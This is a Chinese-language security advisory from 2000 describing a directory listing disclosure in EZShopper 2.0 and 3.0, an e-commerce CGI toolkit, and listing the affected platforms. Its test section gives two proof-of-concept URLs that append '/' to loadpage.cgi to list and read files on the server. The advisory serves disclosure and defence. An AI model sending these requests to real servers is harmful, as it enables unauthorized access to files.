Alex Heiphetz Group EZShopper存在目录列表泄露漏洞

发布时间：2000-12-15
更新时间：2000-12-15
严重程度：中
威胁程度：远程非授权文件存取
错误类型：输入验证错误
利用方式：服务器模式

受影响系统

Alex Heiphetz Group, Inc. EZShopper 3.0
   - Sun Solaris 8.0
   - RedHat Linux 7.0
   - Microsoft Windows NT 4.0
Alex Heiphetz Group, Inc. EZShopper 2.0
   - Sun Solaris 8.0
   - RedHat Linux 7.0
   - Microsoft Windows NT 4.0

详细描述
EZShopper是一个电子商务工具包，其中存在漏洞可以使远程用户获得读访问EZShpooer 目录中的各种文件，通过在CGI应用中追加'/'的URL，EZShopper可以泄露目录信息。可以使攻击者遍历子目录和查看文件。

测试代码
EZshopper v3.0:
http://target/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/

EZshopper v2.0:
http://target/cgi-bin/ezshopper2/loadpage.cgi?id+/

解决方案
尚无

相关信息

最近严重漏洞

Alex Heiphetz Group EZShopper存在目录列表泄露漏洞